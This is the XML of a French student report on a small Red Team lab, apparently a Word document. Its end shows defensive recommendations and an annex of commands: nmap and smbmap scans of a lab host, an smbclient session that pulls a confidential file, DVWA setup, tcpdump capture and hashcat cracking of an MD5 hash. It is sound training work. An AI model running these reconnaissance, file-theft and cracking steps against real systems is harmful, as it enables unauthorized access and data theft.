    <w:p w14:paraId="00A6336B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Téléchargements massifs de fichiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030F3617" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Authentifications anormales sur le domaine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799AB5E4" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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 xml:space="preserve">Utiliser des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cmdlets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AD côté Blue Team :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F40F79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Get-ADUser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Filter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*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A67C5B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Get-ADGroupMember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"Domain Admins"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1886C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Get-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EventLog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LogName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Security -Newest 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F7217C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Pour détecter des comportements suspects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CC7DC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8.2 Pour les applications Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5802B63A" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Suivre les recommandations OWASP Top 10 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B15B50B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Utiliser des requêtes préparées (paramétrées).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF6F5F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Ne jamais concaténer directement les entrées utilisateur dans les requêtes SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F0331A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Filtrer/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sanitiser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les entrées (XSS, injection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E550FF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Protéger les cookies de session (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HttpOnly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, Secure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F613DB2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Faire :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088C78F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Des revues de code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5C7006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Des tests de sécurité réguliers (SAST/DAST).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67425D10" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="43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Des audits applicatifs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F90DB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8.3 Sur le plan organisationnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288FC7A6" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Sensibiliser les utilisateurs :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEAFE8D" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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Ne pas réutiliser des mots de passe faibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0834397F" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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Comprendre les risques de fuite de documents internes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568E818C" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Mettre en place :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340CAB7B" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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lastRenderedPageBreak/>
        <w:t>Une défense en profondeur : segmentation réseau, filtrage, surveillance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B5E47D" w14:textId="0AF15EC7" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44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Des processus d’intervention : que faire en cas d’incident confirmé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0B8B4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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEA933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Ce mini-laboratoire Red Team m’a permis de :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211E3A7D" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Concevoir et configurer un environnement réseau multi-VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB685FC" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Mettre en œuvre deux scénarios d’attaque distincts :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383ECD58" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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 : scan, exfiltration de fichiers depuis un poste Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5876AB" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Web (DVWA) : SQL Injection, XSS, bruteforce de hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CD65D2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Documenter les étapes sous forme :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC8121E" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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 commandes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386BC0CC" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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 scénarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D018EB" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45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De schémas d’attaque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258BBC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Il montre que, même dans un environnement réduit, des mauvaises pratiques simples (mots de passe faibles, pas de validation d’entrée, services trop ouverts) suffisent à compromettre la confidentialité des données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129657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Ce travail peut servir de base pour aller plus loin :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C255BD8" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Ajouter d’autres vecteurs d’attaque (phishing, RDP,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Kerberoasting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…).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50415C5D" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Mettre en place une vraie Blue Team avec SIEM et détection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6182D" w14:textId="78D5BE72" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:num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Automatiser certains tests avec des outils comme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Metasploit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ou des scripts maison.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000A6146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386">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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10. Annexes – Commandes utilisées</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294275A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10.1 Réseau &amp; ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A741A2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ip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addr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show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8DC86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ip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route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564E0EA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ping -c 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3 192.168.233.20</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B940FF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ping -c 3 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8.8.8.8</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4A34D8D5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10.2 SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F515F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nmap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sV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-p 445 192.168.233.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11919C3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smbmap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-H 192.168.233.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A233A6F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-L \\192.168.233.20 -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5485743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smbclient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\\192.168.233.20\Partage_client -U client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC91FAE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fr-FR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>get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fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> fichier_confidentiel.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D10FAF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10.3 Docker / DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03536C44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cd ~/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dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="326D2F5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sudo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docker-compose up -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d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="21BCFC43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docker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ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A266BE8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curl -I </w:t>
      </w:r>
      <w:proofErr w:type="gram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http://127.0.0.1:8081</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F068DC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10.4 Capture réseau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1979033A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sudo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tcpdump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i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ens33 host IP_CLIENT and port 8081 -w ~/captures/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dvwa_demo.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="527D80F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10.5 Hash /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</w:p>
    <w:p w14:paraId="33C87239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echo -n "5f4dcc3b5aa765d61d8327deb882cf99" &gt; hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD2B1ED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lastRenderedPageBreak/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--version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0093EF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hashcat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-m 0 -a 0 hash.txt smalllist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A381290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10.6 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Exemples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cmdlets AD (Blue Team)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442CF6E1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Get-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ADUser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-Filter *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C07E40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Get-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ADGroupMember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"Domain Admins"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C4265B" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr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Get-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EventLog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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>LogName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F1386">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security -Newest 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59196C9B" w14:textId="4CD3F852" w:rsidR="00762E89" w:rsidRPr="008F1386" w:rsidRDefault="00762E89" w:rsidP="008F1386">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-CA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00762E89" w:rsidRPr="008F13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9552A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB4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2333"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="139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442C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A4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713AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="55A0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F04B6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBB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647F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4D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56C72"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FB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4643B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04B2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F178C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BAC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055E11"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E04FE58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20F22888"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C4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6A362D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2DB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E18A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01B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B18DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19E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A3911"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C0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B6999"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD6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F6EA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD4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1335C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C6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D5B80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21B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15921"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03B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0E02FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="778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A59F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9942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82906"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="022A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B179A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D7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E73F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F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8A2C53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BF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6014D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="253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B17B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="551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42D81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE1A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3136F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F5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167B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D8225A6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5441088B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C69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F13870"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF8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22D07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E3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52AC8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E618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31951"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9F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41DEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD6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187A9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="715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939AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FE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5C2331"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C8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332B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E9E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7D232A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="928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B6A73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C8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91207A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="579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14118">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1874730205">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1121457666">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="734820309">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2000187871">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2070111942">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2143687402">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1808818968">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="965351524">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="729498903">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="720403452">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1005285292">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="103235673">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="217711462">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="994989460">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1387411958">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1304115924">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1013725238">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="985091798">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="689532863">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1430545403">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="215239517">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1146319371">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="960961161">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="615720049">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="305622289">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="849297752">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1317033366">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="817456281">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="568073585">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="2632363">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="541094010">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="819425275">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1039672650">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="2040085240">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1697733634">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="919025611">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="2054114091">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="447698462">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="588002789">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="335422988">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="406535574">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="318534896">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1473524939">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="646976739">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1706100727">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1242712493">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="355278870">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1034233960">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="235097322">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="534539660">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="1809860547">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="1856030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E3E"/>
    <w:rsid w:val="00034616"/>
    <w:rsid w:val="0006063C"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="001543B1"/>
    <w:rsid w:val="001A4330"/>
    <w:rsid w:val="001F42C6"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="003F5A41"/>
    <w:rsid w:val="00437BBC"/>
    <w:rsid w:val="00455C8E"/>
    <w:rsid w:val="005721F7"/>
    <w:rsid w:val="00762E89"/>
    <w:rsid w:val="00891E7F"/>
    <w:rsid w:val="008F1386"/>
    <w:rsid w:val="00A35481"/>
    <w:rsid w:val="00A80471"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00C61D17"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00D56BBE"/>
    <w:rsid w:val="00DA2D55"/>
    <w:rsid w:val="00E14E39"/>
    <w:rsid w:val="00E20787"/>
    <w:rsid w:val="00EA0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AB3FAE"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{E73A8489-9B60-46E4-9345-96D8608C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31</Pages>
  <Words>3306</Words>
  <Characters>18183</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>151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LAYBA OULARE</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-03T07:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-03T19:20:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>